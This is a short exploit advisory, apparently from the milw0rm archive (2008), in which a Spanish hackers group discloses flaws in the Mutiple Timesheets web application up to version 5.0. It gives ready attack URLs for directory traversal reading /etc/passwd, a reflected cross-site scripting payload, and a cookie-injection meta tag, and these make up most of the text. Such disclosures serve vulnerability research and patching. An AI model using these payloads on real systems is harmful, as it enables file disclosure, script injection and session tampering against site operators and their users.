40 lines
No EOL
1.7 KiB
Text
40 lines
No EOL
1.7 KiB
Text
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
|
|
--==+ Mutiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities +==--
|
|
--==+====================================================================================+==--
|
|
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
|
|
|
|
[+] Info:
|
|
|
|
[~] Software: Mutiple Timesheets
|
|
[~] Download: http://riceball.com/drupal/files/mts-5.zip
|
|
[~] Exploit: Multiple Remote Vulnerabilities [High]
|
|
[~] Bug Found By: JosS
|
|
[~] Contact: sys-project[at]hotmail.com
|
|
[~] Web: http://www.spanish-hackers.com
|
|
[~] Good!
|
|
|
|
[+] Directory traversal:
|
|
|
|
[~] Vuln File: index.php
|
|
[~] Exploit: http://localhost/PATH/?tab=[FILE]
|
|
[~] Example: http://localhost/apps/mts/mts/?tab=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
|
|
|
|
[+] Cross Site Scripting:
|
|
|
|
[~] Vuln File: index.php
|
|
[~] Exploit: http://localhost/PATH/?tab=[XSS]
|
|
[~] Example: http://localhost/apps/mts/mts/?tab=>'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>
|
|
|
|
[+] Cookie Manipulation:
|
|
|
|
[~] Vuln File: index.php, clientinfo.php, invoices.php, smartlinks.php, todo.php
|
|
[~] Exploit: http://localhost/PATH/index.php?mode=edit&tab=[Cookie]
|
|
[~] Example: /apps/mts/mts/index.php?mode=edit&tab=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
|
|
|
|
|
|
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
|
|
--==+ JosS +==--
|
|
--==+====================================================================================+==--
|
|
[+] [The End]
|
|
|
|
# milw0rm.com [2008-03-16] |